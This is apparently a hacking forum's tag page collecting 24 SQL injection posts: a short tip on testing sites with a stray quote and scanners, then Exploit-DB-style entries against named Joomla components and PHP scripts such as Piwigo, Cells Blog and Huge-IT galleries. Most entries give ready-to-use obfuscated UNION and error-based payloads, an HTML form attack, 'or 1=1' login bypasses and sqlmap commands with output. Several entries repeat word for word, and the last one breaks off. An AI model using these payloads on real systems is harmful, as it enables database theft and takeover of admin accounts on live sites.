Showing results for the tag 'sql'.



93 results found

  1. Hacking-Bugs

    The SQL bug, that is, SQL injection: this bug was identified in 2012. It is one of the major programming errors. Usually, when a hacker wants to attack a target site, he first gets into the site's database; after getting in, he finds the username and password of the admin page and defaces the site. To find and identify this bug, it is enough to scan your own site with different scanners, such as Vega and Acunetix; these two are among the strongest scanners available in the hacking field. Look closely at your own site: if the following dork is at the end of your site's address, the site has the SQL bug: index.php?id=10. If it is not there, put a ' at the end of the site's address; if the site returns an error, it has the SQL bug, and if it loads, it does not have the SQL bug. Thanks.
  2. Hacking

    # # # # # # Exploit Title: Joomla! Component JBuildozer 1.4.1 - SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://jbuildozer.com/ # Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/jbuildozer/ # Version: 1.4.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=[SQL] # # 1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # http://server/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # # # # #
  3. Hacking

    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  4. Hacking

    # # # # # # Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://piwigo.org/ # Software Link: http://piwigo.org/basics/downloads # Version: <= 2.9.1 # Category: Webapps # Tested on: WiN7_x64/WIN10_X64 # CVE: CVE-2017-10682 # # # # # # Exploit Author: Akityo # Email: [email protected] # # # # # # Description: # # SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter # in the comments or status page to cat_options.php. # # # # # # # # Proof-of-Concent: # # POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1 # Host: www.test.com # Content-Length: 34 # Cache-Control: max-age=0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 # Upgrade-Insecure-Requests: 1 # User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 # Content-Type: application/x-www-form-urlencoded # Accept-Encoding: gzip, deflate # Accept-Language: zh-CN,zh;q=0.8 # Cookie: null # Connection: close # # cat_false%5B%5D=[payload here]&trueify=%C2%AB # # # # # # #
  5. Hacking

    # # # # # # Exploit Title: Cells Blog 3.5 - SQL Injection # Dork: N/A # Date: 16.12.2017 # Vendor Homepage: http://www.cells.tw/ # Software Link: http://www.cells.tw/cells/ # Version: 3.5 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL] # # -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1 AND 9841=9841&fmid=7 # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1&fmid=7 AND 2056=2056 # 2) # http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL] # # Parameter: fnid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592 # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12 # # 3) # http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL] # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10 AND 9273=9273 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based 
blind - WHERE or HAVING clause # Payload: bgid=2 AND 9536=9536&fmid=10 # # 4) # http://localhost/[PATH]/fourm.php?bgid=[SQL]&fmid=[SQL] # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1&fmid=2 AND 5699=5699 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1 AND 9899=9899&fmid=2 # # # # # #
  6. Hacking

    # # # # # # Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection # Dork: N/A # Date: 17.12.2017 # Vendor Homepage: https://www.ijoomla.com/ # Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/guruBuy?promocode=[SQL] # # '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%[email protected]@version))%2c0)%2d%2d%200x2d # # # # # #
  7. # # # # # # Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection # Dork: N/A # Date: 19.12.2017 # Vendor Homepage: hhttp://nextgeneditor.com/ # Software Link: https://extensions.joomla.org/extension/nextgen-editor/ # Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free # Version: 2.1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL] # # %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d # # # # # #
  8. Hacking

    # # # # # # Exploit Title: Matrimonial Script - SQL Injection # Dork: N/A # Date: 22.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Demo: http://www.mscript.in/matrimonial-demo.html # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/viewprofile.php?id=[SQL] # # http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL] # # -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+- # # http://localhost/[PATH]/printprofile.php?id=[SQL] # http://localhost/[PATH]/viewphoto.php?id=[SQL] # http://localhost/[PATH]/advsearch_results.php?gender=[SQL] # http://localhost/[PATH]/advsearch_results.php?age1=[SQL] # http://localhost/[PATH]/advsearch_results.php?age2=[SQL] # http://localhost/[PATH]/advsearch_results.php?religion=[SQL] # http://localhost/[PATH]/advsearch_results.php?caste=[SQL] # http://localhost/[PATH]/advsearch_results.php?ms=[SQL] # http://localhost/[PATH]/advsearch_results.php?language=[SQL] # http://localhost/[PATH]/advsearch_results.php?edu=[SQL] # http://localhost/[PATH]/advsearch_results.php?occu=[SQL] # http://localhost/[PATH]/advsearch_results.php?country=[SQL] # # Etc.. # # # # #
  9. # # # # # # Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://www.weborange.eu/ # Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/ # Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail # Version: 3.0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL] # # 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 # # Etc.. # # # # #
  10. # # # # # # Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://www.weborange.eu/ # Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail # Demo: http://www.weborange.eu/demo/index.php/bargain-product # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL] # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL] # # 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31 # # Etc.. # # # # #
  11. Hacking

    # # # # # # Exploit Title: Joomla! Component OSDownloads 1.7.4 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://joomlashack.com/ # Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/osdownloads/ # Demo: https://demoextensions.joomlashack.com/osdownloads # Version: 1.7.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL] # # 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 # # Etc.. # # # # #
  12. Hacking

    # # # Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor: http://kamleshyadav.com/ # Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368 # Demo: http://kamleshyadav.com/scripts/autocar_preview/ # Version: 1.1 # Tested on: WiN10_X64 # Exploit Author: Bora Bozdogan # Author WebSite : http://borabozdogan.net.tr # Author E-mail : [email protected] # # # POC: # # http://localhost/[PATH]/search-cars?category=[SQL] # ts_user # user_uname # user_fname # user_lname # user_email # user_pwd # #
  13. Hacking

    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL] # # 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  14. Hacking

    # # # # # # Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://extro.media/ # Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/ # Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en # Version: 1.6.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL] # # Etc.. # # # # #
  15. Hacking

    # # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
  16. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  17. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  18. Hacking

    # # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
  19. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  20. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  21. # Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/ # Software Link: # Version: 1.0.6 # Tested on: Linux # CVE : CVE-2016-1000124 # Advisory: http://www.vapidlabs.com/advisory.php?v=170 # Exploit: • $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" • • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • --- • [13:30:39] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [13:30:39] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2715 times • [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 13:30:39
  22. # Exploit Title Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-catalog/ # Software Link: # Version: 1.0.7 # Tested on: Linux # CVE : CVE-2016-1000125 # Advisory: http://www.vapidlabs.com/advisory.php?v=171 # Exploit: • $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" • • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: UNION query • Title: Generic UNION query (random number) - 15 columns • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • --- • [16:48:10] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [16:48:10] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 6637 times • [16:48:10] 
[INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 16:48:10
  23. Hacking

    # # # # # # Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection # Dork: N/A # Date: 30.08.2017 # Vendor Homepage: http://joomplace.com/ # Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/ # Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe # Version: 3.7.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL] # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL] # # Etc.. # # # # #
  24. # Exploit Title Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla # Google Dork: [if applicable] # Date: 2016-09-15 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-video-gallery/ # Software Link: # Version: 1.0.9 # Tested on: Linux # CVE : CVE-2016-1000123 # Advisory: http://www.vapidlabs.com/advisory.php?v=169 # Exploit: • $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" • . • . • . • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2 • --- • [19:36:55] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [19:36:55] [WARNING] HTTP error codes detected during run: • 500 